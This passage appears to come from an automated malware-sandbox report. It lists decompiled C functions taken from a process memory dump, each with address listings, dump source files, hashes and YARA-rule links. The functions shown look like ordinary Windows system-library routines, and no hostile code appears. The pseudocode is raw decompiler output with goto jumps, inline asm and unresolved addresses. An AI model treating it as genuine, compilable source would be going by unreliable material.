						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E03746B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E03746B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E036E7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E03709AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0370B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L036E4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                      0x03747016
                                      0x0374701e
                                      0x0374702b
                                      0x03747033
                                      0x03747037
                                      0x0374703c
                                      0x0374703e
                                      0x03747041
                                      0x03747045
                                      0x0374704a
                                      0x03747050
                                      0x03747055
                                      0x0374705a
                                      0x03747062
                                      0x03747062
                                      0x0374705a
                                      0x03747064
                                      0x03747064
                                      0x03747067
                                      0x03747071
                                      0x03747096
                                      0x0374709b
                                      0x037470a2
                                      0x037470a6
                                      0x037470a7
                                      0x037470ad
                                      0x037470b3
                                      0x037470b6
                                      0x037470bb
                                      0x037470c3
                                      0x037470c3
                                      0x037470c6
                                      0x037470cd
                                      0x037470dd
                                      0x037470e0
                                      0x037470e2
                                      0x037470e2
                                      0x037470ee
                                      0x03747101
                                      0x037470f0
                                      0x037470f9
                                      0x037470f9
                                      0x0374710a
                                      0x0374710e
                                      0x03747112
                                      0x03747117
                                      0x03747118
                                      0x03747118
                                      0x037470bb
                                      0x0374711d
                                      0x03747123
                                      0x03747131
                                      0x03747131
                                      0x03747136
                                      0x0374713d
                                      0x0374713e
                                      0x0374713f
                                      0x0374714a
                                      0x0374714a
                                      0x03747084
                                      0x03747088
                                      0x00000000
                                      0x0374708e
                                      0x0374708e
                                      0x03747092
                                      0x00000000
                                      0x03747092

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9a86d5be08199e77158ace546b41f077fe9abf1b56ac34076e725f713fb92e1e
                                      • Instruction ID: f7c743fbc018f8b76858960b2994e6f10252c165c6d5d01b096cefaa947c5885
                                      • Opcode Fuzzy Hash: 9a86d5be08199e77158ace546b41f077fe9abf1b56ac34076e725f713fb92e1e
                                      • Instruction Fuzzy Hash: 3231D7766057959FC325DF68C840A6AB3E5FFC8700F044A2DF8A59B790E730E904C7A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036FA70E, Relevance: .1, Instructions: 96COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 92%
                                      			E036FA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x37b7b10; // 0x8
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x37b7b10 = 8;
					 *0x37b7b14 = 0x37b7b0c;
					 *0x37b7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x9
					E036FA990(0x37b7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L036FA840(__edx, __ecx, __ecx, _t52, 0x37b7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x37b7b10; // 0x8
					_t3 = _t37 + 0x27; // 0x2f
					__eflags = _t3 >> 5 -  *0x37b7b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x37b7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x2f
						_v8 = _t4 >> 5;
						_t50 = L036E4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x37b7b18 = _v8;
						_t8 = _t52 + 7; // 0xf
						E0370F3E0(_t50,  *0x37b7b14, _t8 >> 3);
						_t28 =  *0x37b7b14; // 0x77f07b0c
						__eflags = _t28 - 0x37b7b0c;
						if(_t28 != 0x37b7b0c) {
							L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x10
						 *0x37b7b14 = _t50;
						_t48 = _v12;
						 *0x37b7b10 = _t9;
						goto L6;
					}
					 *0x37b7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                      0x036fa713
                                      0x036fa714
                                      0x036fa717
                                      0x036fa71d
                                      0x036fa720
                                      0x036fa722
                                      0x036fa727
                                      0x036fa74a
                                      0x036fa754
                                      0x036fa75e
                                      0x036fa768
                                      0x036fa76a
                                      0x036fa773
                                      0x036fa78b
                                      0x036fa790
                                      0x036fa792
                                      0x036fa741
                                      0x036fa741
                                      0x036fa743
                                      0x036fa749
                                      0x036fa749
                                      0x036fa732
                                      0x036fa73a
                                      0x036fa797
                                      0x036fa79d
                                      0x036fa7a3
                                      0x036fa7a9
                                      0x036fa7b6
                                      0x036fa7bc
                                      0x036fa7ca
                                      0x036fa7e0
                                      0x036fa7e2
                                      0x036fa7e4
                                      0x03739bf2
                                      0x00000000
                                      0x03739bf2
                                      0x036fa7ed
                                      0x036fa7f2
                                      0x036fa800
                                      0x036fa805
                                      0x036fa80d
                                      0x036fa812
                                      0x03739c08
                                      0x03739c08
                                      0x036fa818
                                      0x036fa81b
                                      0x036fa821
                                      0x036fa824
                                      0x00000000
                                      0x036fa824
                                      0x036fa7ae
                                      0x00000000
                                      0x036fa7ae
                                      0x036fa73c
                                      0x036fa73e
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e089d705c04bf5fa0949fdd7ffe0bf468d1c000e7e9920b07deda2ecaacd91f8
                                      • Instruction ID: 7b5d0a6679b0f56032677fafc8fcd22351e1f1cfd5ace2c283cdbda773e430b8
                                      • Opcode Fuzzy Hash: e089d705c04bf5fa0949fdd7ffe0bf468d1c000e7e9920b07deda2ecaacd91f8
                                      • Instruction Fuzzy Hash: A631EFB5220280DFCB19DB58D881F6AB7FAFFC5710F14895AE1198B744E7B4A901CF91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036CAA16, Relevance: .1, Instructions: 93COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 95%
                                      			E036CAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x37bd360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x37b7b9c; // 0x0
					_t53 = L036E4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0370B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0370F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L036D6C59(_t53, _t51, _t58) != 0) {
							_t28 = E036F5E50(0x36ac338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E036FB230(_v32, _v28, 0x36ac2d8, 1,  &_v24);
								_t28 = E036CF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                      0x036caa25
                                      0x036caa29
                                      0x036caa2d
                                      0x036caa30
                                      0x036caa37
                                      0x036caa3c
                                      0x03724458
                                      0x03724458
                                      0x03724472
                                      0x03724474
                                      0x03724476
                                      0x036caa64
                                      0x036caa74
                                      0x0372447c
                                      0x03724483
                                      0x03724492
                                      0x036caa52
                                      0x036caa54
                                      0x036caa5e
                                      0x037244a8
                                      0x037244ad
                                      0x037244af
                                      0x037244b6
                                      0x037244b6
                                      0x037244b9
                                      0x037244bc
                                      0x037244cd
                                      0x037244d3
                                      0x037244d6
                                      0x037244e1
                                      0x037244e1
                                      0x037244e6
                                      0x037244e8
                                      0x037244fb
                                      0x037244fb
                                      0x037244e8
                                      0x00000000
                                      0x036caa5e
                                      0x03724476
                                      0x036caa42
                                      0x036caa46
                                      0x036caa48
                                      0x036caa4c
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 86810fbf633454d83ab35f5eb01e7426b03443372bb662fe7a89bdf6fb2bf729
                                      • Instruction ID: b3c54296b5968b70614b68ba9428aa6d74ed44bcda55e92d398cb64543140a22
                                      • Opcode Fuzzy Hash: 86810fbf633454d83ab35f5eb01e7426b03443372bb662fe7a89bdf6fb2bf729
                                      • Instruction Fuzzy Hash: B931CE71A00269AFCF15EFA9CD81A7FB7B8EF04700B05406DF901EB240EB749A11CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036F61A0, Relevance: .1, Instructions: 93COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 97%
                                      			E036F61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E036F5E50(0x36a67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E03799D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E036CF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                      0x036f61b3
                                      0x036f61b5
                                      0x036f61bd
                                      0x036f61c3
                                      0x036f61c7
                                      0x036f61d2
                                      0x036f61ff
                                      0x036f61ff
                                      0x036f6201
                                      0x036f6207
                                      0x036f6207
                                      0x036f61d4
                                      0x036f61d9
                                      0x00000000
                                      0x00000000
                                      0x036f61df
                                      0x036f61e2
                                      0x00000000
                                      0x00000000
                                      0x036f61e6
                                      0x036f61e8
                                      0x036f61ee
                                      0x036f61ee
                                      0x036f61f9
                                      0x0373762f
                                      0x03737632
                                      0x03737635
                                      0x03737639
                                      0x03737640
                                      0x0373766e
                                      0x03737675
                                      0x00000000
                                      0x00000000
                                      0x03737681
                                      0x03737689
                                      0x0373768d
                                      0x03737691
                                      0x03737695
                                      0x03737699
                                      0x037376af
                                      0x037376b5
                                      0x037376b7
                                      0x037376b7
                                      0x037376d7
                                      0x037376dc
                                      0x00000000
                                      0x037376dc
                                      0x037376a2
                                      0x037376a9
                                      0x03737651
                                      0x03737653
                                      0x03737653
                                      0x03737656
                                      0x03737656
                                      0x00000000
                                      0x03737656
                                      0x03737644
                                      0x03737646
                                      0x03737648
                                      0x03737648
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3a3703656af63254e33ea8e670e4bb0fb78ad7495b2c3212dfbca35101965f33
                                      • Instruction ID: 1814ac8a91afbdb98c40d1c9d05ff3b3a2910ab7bda8e48ae81911b70c4dafd1
                                      • Opcode Fuzzy Hash: 3a3703656af63254e33ea8e670e4bb0fb78ad7495b2c3212dfbca35101965f33
                                      • Instruction Fuzzy Hash: 053178B1605741CFD324DF09C950B2AFBE4EB88B00F09496DE9989B352E7B0E804CB95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03704A2C, Relevance: .1, Instructions: 92COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 58%
                                      			E03704A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x37bd360 ^ _t62;
				_v8 =  *0x37bd360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E036E2280(_t26, 0x37b8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E036DFFB0(_t41, _t51, 0x37b8608);
						L2:
						 *0x37bb1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0370B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E036E2280(_t28, 0x37b8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E036DFFB0(_t42, _t53, 0x37b8608);
							if(_t53 != 0) {
								L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E036DFFB0(_t41, _t51, 0x37b8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                      0x03704a2c
                                      0x03704a34
                                      0x03704a3c
                                      0x03704a3e
                                      0x03704a48
                                      0x03704a4b
                                      0x03704a4d
                                      0x03704a51
                                      0x03704a9c
                                      0x00000000
                                      0x00000000
                                      0x03704aa3
                                      0x03704aa8
                                      0x03704aad
                                      0x03704ab1
                                      0x03704ade
                                      0x03704ae3
                                      0x03704a5a
                                      0x03704a62
                                      0x03704a6a
                                      0x03704a6e
                                      0x0373f203
                                      0x03704a84
                                      0x03704a88
                                      0x03704a89
                                      0x03704a8a
                                      0x03704a95
                                      0x03704a95
                                      0x03704a79
                                      0x03704a80
                                      0x03704af2
                                      0x03704af4
                                      0x03704af9
                                      0x03704aff
                                      0x03704b01
                                      0x03704b03
                                      0x03704b08
                                      0x0373f20a
                                      0x0373f212
                                      0x0373f216
                                      0x0373f216
                                      0x03704b08
                                      0x03704b13
                                      0x03704b1a
                                      0x0373f229
                                      0x0373f229
                                      0x03704b1a
                                      0x03704a82
                                      0x00000000
                                      0x03704a82
                                      0x03704ab7
                                      0x03704acd
                                      0x03704acd
                                      0x03704ad5
                                      0x03704ada
                                      0x00000000
                                      0x03704ada
                                      0x03704ac2
                                      0x03704acb
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x03704acb
                                      0x03704a53
                                      0x03704a53
                                      0x03704a58
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: be7cffe621077f8302f8ba73a534ddd5ce33bbb3819b4501863ac0cddebfea20
                                      • Instruction ID: fafd53390f52681c2fa852da5c855279e064f4b7ef242a5104324a01d5f98937
                                      • Opcode Fuzzy Hash: be7cffe621077f8302f8ba73a534ddd5ce33bbb3819b4501863ac0cddebfea20
                                      • Instruction Fuzzy Hash: 3C312172605344DFCB21EF15C985B2AB7F8FB85604F08486DEA225F282C770D804CF8A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03708EC7, Relevance: .1, Instructions: 92COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 93%
                                      			E03708EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x37bd360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E036F4E70(0x37b86e4, 0x3709490, 0, 0);
					if( *0x37b53e8 > 5 && E03708F33(0x37b53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x37b53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x37b53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x36abc46;
						_t48 = E03747B9C(0x37b53e8, 0x36abc46, _t67, 0x37b53e8, _t70,  &_v140);
					}
				}
				return E0370B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                      0x03708ec7
                                      0x03708ed9
                                      0x03708edc
                                      0x03708ee6
                                      0x03708ee9
                                      0x03708eee
                                      0x03708efc
                                      0x03708f08
                                      0x03741349
                                      0x03741353
                                      0x0374135d
                                      0x03741366
                                      0x0374136f
                                      0x03741375
                                      0x0374137c
                                      0x03741385
                                      0x03741390
                                      0x03741391
                                      0x0374139c
                                      0x0374139d
                                      0x037413a6
                                      0x037413ac
                                      0x037413b2
                                      0x037413b5
                                      0x037413bc
                                      0x037413bf
                                      0x037413c2
                                      0x037413c5
                                      0x037413c8
                                      0x037413cb
                                      0x037413ce
                                      0x037413d1
                                      0x037413d4
                                      0x037413d7
                                      0x037413da
                                      0x037413dd
                                      0x037413e0
                                      0x037413e3
                                      0x037413e6
                                      0x037413e9
                                      0x037413f6
                                      0x03741400
                                      0x03741400
                                      0x03708f08
                                      0x03708f32

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cf7bc41ec2a551c4974f0bd5640318cdd22d7959ad26b28f4b81620fb2780bd9
                                      • Instruction ID: c8fc3e45e0c08b24d3f14655a3742655c9fc06901a4918f8976bbaf6917b7c4e
                                      • Opcode Fuzzy Hash: cf7bc41ec2a551c4974f0bd5640318cdd22d7959ad26b28f4b81620fb2780bd9
                                      • Instruction Fuzzy Hash: 9941A2B1D00318EEDB20CFAAD980AADFBF4FB48310F5041AEE519A7241E7745A44CF61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036FE730, Relevance: .1, Instructions: 89COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 74%
                                      			E036FE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E03709670() < 0) {
					L0371DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x37b7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L036E4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M036FE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                      0x036fe730
                                      0x036fe736
                                      0x036fe738
                                      0x036fe73d
                                      0x036fe73e
                                      0x036fe740
                                      0x036fe749
                                      0x036fe765
                                      0x036fe76a
                                      0x036fe76b
                                      0x036fe76c
                                      0x036fe76d
                                      0x036fe76e
                                      0x036fe76f
                                      0x036fe775
                                      0x036fe777
                                      0x036fe77e
                                      0x0373b675
                                      0x036fe784
                                      0x036fe784
                                      0x036fe789
                                      0x036fe7a8
                                      0x036fe7ac
                                      0x036fe807
                                      0x036fe7ae
                                      0x036fe7ae
                                      0x036fe7b1
                                      0x036fe7b4
                                      0x036fe7b9
                                      0x036fe7c0
                                      0x036fe7c4
                                      0x036fe7ca
                                      0x036fe7cc
                                      0x00000000
                                      0x036fe7d3
                                      0x036fe7d6
                                      0x00000000
                                      0x00000000
                                      0x036fe7ff
                                      0x036fe802
                                      0x00000000
                                      0x00000000
                                      0x036fe7f9
                                      0x036fe7fc
                                      0x00000000
                                      0x00000000
                                      0x036fe7f3
                                      0x036fe7f6
                                      0x00000000
                                      0x00000000
                                      0x036fe7ed
                                      0x036fe7f0
                                      0x00000000
                                      0x00000000
                                      0x036fe7e7
                                      0x036fe7ea
                                      0x00000000
                                      0x00000000
                                      0x0373b685
                                      0x0373b688
                                      0x00000000
                                      0x00000000
                                      0x0373b682
